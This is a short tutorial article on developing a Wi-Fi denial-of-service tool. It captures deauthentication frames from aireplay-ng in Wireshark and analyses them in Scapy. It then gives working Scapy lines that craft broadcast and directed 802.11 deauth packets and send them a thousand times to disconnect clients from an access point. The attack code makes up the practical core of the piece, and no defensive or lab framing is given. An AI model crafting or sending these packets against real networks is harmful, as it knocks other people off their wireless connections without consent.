In this article I will talk to you about the process of developing an attack tool. As an example, we will develop a wireless network DoS tool. We will follow the steps below for this
- How to Work?
- Run attack tool for sample packets
- Capture traffic with wireshark for analysis
- Exporting specific packets with wireshark for detail analysis
- Import exported specific packets to scapy console for analysis
- Analysis packets for detail informations
- Craft a packet with scapy
- Send packets to target
How to Work?
First we have to answer this question. Because if you do not know how a system works, you can not develop an attack or defense. We should answer the following question for this example:
- How does a client’s connection break from the access point?
answer: The main problem here is deauthentication packets.
Run attack tool for sample packets (Reverse Engineering)
For this reason, we will need these packets. This step is actually a reverse engineering step. In this step, we will run aireplay-ng.
We need two types of packet for this process:
- Broadcast deauthentication packets
- Not broadcast
~ Not broadcast
Capture traffic with wireshark for analysis || Exporting specific packets
After running the aireplay-ng tool, we capture sample packets with wireshark. After capturing the packages, we export sample packages from the main menu of Wireshark by following the path File -> Export Specific Packet.
Import exported specific packets to scapy console for analysis
In the shell of the Scapy tool we import the files for analysis with the rdpcap function.
detail information for deauthentication packets (Layers)
addr1 = Destination addr2 = Source addr3 = Source addr4 = None
~ Not broadcast
addr1 = Destination addr2 = Source addr3 = Destination addr4 = None
Craft a packet with scapy
broadcast = RadioTap() / Dot11(addr1=broad, addr2=bssid.lower(), addr3=bssid.lower())/Dot11Deauth() direct = RadioTap() / Dot11(addr1=bssid, addr2=client.lower(), addr3=bssid)/Dot11Deauth()
Send Packet(s) to Target(s)
Finally, we send the packets we created to the destination 🙂
Direct sendp(direct, iface='wlan0', count=1000, inter = .2, verbose=False) Broadcast sendp(broadcast, iface='wlan0', count=1000, inter = .2, verbose=False)